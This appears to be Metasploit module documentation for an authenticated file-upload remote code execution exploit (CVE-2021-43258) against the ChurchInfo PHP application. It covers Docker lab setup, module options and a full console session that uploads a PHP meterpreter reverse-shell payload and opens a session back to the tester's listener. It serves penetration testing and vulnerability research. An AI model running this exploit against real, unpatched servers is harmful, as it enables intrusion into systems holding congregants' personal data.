## Vulnerable Application * Project Homepage: http://www.churchdb.org/ * Project Download: https://sourceforge.net/projects/churchinfo/files/ ChurchInfo is an open source PHP application used to help churches manage systems and users of the church. There are various vulnerabilities in the ChurchInfo software which can be exploited by an attacker, however this module targets an authenticated remote code execution (RCE) vulnerability known as CVE-2021-43258 to execute code as the web daemon user (e.g. www-data). ChurchInfo v1.2.13, v1.2.14, and v1.3.0 contain functionality to email users listed in the ChurchInfo database with attachments. When preparing the email, a draft of the attachment is saved into `/tmp_attach/`, which is a web accessible folder under the ChurchInfo web root. Before the email is sent, the attachment draft can be loaded in the application. By uploading a malicious PHP file as an attachment and then browsing to it on the web server, RCE can be achieved. This vulnerability was assigned CVE-2021-43258. Version 1.3.0 was the latest version of ChurchInfo at the time of writing and there is presently no known patch for this issue. ### Installation Installation guides are available on the SourceForge site at https://sourceforge.net/projects/churchinfo/files/. The following however is a quick and easy way to get most versions of ChurchInfo up and running using Docker, which should make it a lot easier to setup and also clean up once you are finished testing things out. 1. `wget https://master.dl.sourceforge.net/project/churchinfo/churchinfo/1.3.0/churchinfo-1.3.0.tar.gz` 1. `tar -xvf churchinfo-1.3.0.tar.gz` 1. `sudo docker run -i -t -p "9090:80" -v ${PWD}/churchinfo:/app mattrayner/lamp:0.8.0-1804-php7`. 1. `sudo docker ps -a` and find the container ID that was created and which is now running. 1. `sudo docker exec -it *container ID* /bin/bash` 1. Inside the new prompt: 1. `mysqladmin -u root -p create churchinfo` and press the ENTER key when prompted for the password. 1. `cd /app/churchinfo/SQL` 1. `mysql -u root -p churchinfo < Install.sql` and press the ENTER key when prompted for the password. 1. `apt-get install nano` if you want to use Nano. 1. `nano /app/churchinfo/Include/Config.php`. 1. Set the `$sUSER` variable to `'root'`. 1. Set the `$sPASSWORD` variable to `''`. 1. Set the `$sRootPath` variable to `'/churchinfo'`. This should be default though. 1. Set the `$URL[0]` to `http://localhost/churchinfo/Default.php`. 1. Exit out of `nano` and run `/etc/init.d/apache2 restart` 1. Log in at `http://127.0.0.1:9090/churchinfo/Default.php` with the username `Admin` and password `churchinfoadmin`. 1. This should cause the app to redirect to a password change form. 1. Specify the old password, aka `churchinfoadmin` and then specify the new password twice and submit the form. 1. Go to `http://127.0.0.1:9090/churchinfo/PersonEditor.php` and fill out the form with as much detail as possible. 1. Click "Save and Add". ## Verification Steps This module requires authenticated access to the application. After identifying a vulnerable ChurchInfo application, there MUST be a person entry available within the database. If there are no person entries within the database, it will not be possible to create a draft email. This draft email will be used to place the malicious attachment into the `/tmp_attach` directory for our exploit. 1. Start `msfconsole` 1. `use exploit/multi/http/churchinfo_upload_exec` 1. Set the target `RHOST`, `APPBASE`, `USERNAME`, and `PASSWORD` values. 1. Optional: Set the target `RPORT` if the ChurchInfo server is running on a different port than port 80. 1. Optional: `set SSL true` if the target is using SSL for ChurchInfo. 1. Select the payload of choice or leave default. 1. Set the `LHOST` to your system. 1. Run the exploit with `run`, enjoy the shell! ## Options There are a handful of options which can be used to further configure the attack or other environmental uses. ### USERNAME The username of a valid user account for the ChurchInfo application. Default is `admin`. ### PASSWORD The password for a valid user account for the ChurchInfo application. Default is `churchinfoadmin` based on documentation. ### APPBASE The base directory path to the ChurchInfo application. This can and will likely vary depending on how the application was installed. Default value is `/churchinfo/`. ### EMAIL_SUBJ The subject of the draft email used for the exploit, the email is not sent. Default value is `Read this now!`. ### EMAIL_MESG The message on the draft email which is used for the exploit. The email is not sent. Default value is `Hello there!`. ## Scenarios If there are no person entries in the database, the exploit will fail. To help troubleshoot, enable verbose mode with the following: ``` set verbose true ``` This will enable additional information and details about the exploit as it is launched. ### ChurchInfo v1.3.0 with MySQL 5.7.35 on Ubuntu Linux 18.04.2 LTS (Docker Image) ``` msf6 > use exploit/multi/http/churchinfo_upload_exec [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf6 exploit(multi/http/churchinfo_upload_exec) > set RHOST 127.0.0.1 RHOST => 127.0.0.1 msf6 exploit(multi/http/churchinfo_upload_exec) > set RPORT 9090 RPORT => 9090 msf6 exploit(multi/http/churchinfo_upload_exec) > set PASSWORD testing123 PASSWORD => testing123 msf6 exploit(multi/http/churchinfo_upload_exec) > show options Module options (exploit/multi/http/churchinfo_upload_exec): Name Current Setting Required Description ---- --------------- -------- ----------- EMAIL_MESG Hello there! yes Email message in webapp EMAIL_SUBJ Read this now! yes Email subject in webapp PASSWORD testing123 yes Password to login with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 9090 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /churchinfo/ yes The location of the ChurchInfo app USERNAME admin yes Username for ChurchInfo application VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 172.30.182.196 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting View the full module info with the info, or info -d command. msf6 exploit(multi/http/churchinfo_upload_exec) > set LHOST docker0 LHOST => docker0 msf6 exploit(multi/http/churchinfo_upload_exec) > run [*] Started reverse TCP handler on 172.18.0.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] Target is ChurchInfo! [+] The target is vulnerable. Target is running ChurchInfo 1.3.0! [+] Logged into application as admin [*] Navigating to add items to cart [+] Items in Cart: Items in Cart: 2 [+] Uploading exploit via temp email attachment [+] Exploit uploaded to /churchinfo/tmp_attach/ueNYs9.php [+] Executing payload with GET request [*] Sending stage (39927 bytes) to 172.18.0.2 [+] Deleted ueNYs9.php [*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:37790) at 2022-11-18 17:44:31 -0600 meterpreter > getpid Current pid: 452 meterpreter > getuid Server username: www-data meterpreter > sysinfo Computer : 8eeaa82293b4 OS : Linux 8eeaa82293b4 5.15.0-53-generic #59-Ubuntu SMP Mon Oct 17 18:53:30 UTC 2022 x86_64 Meterpreter : php/linux meterpreter > ```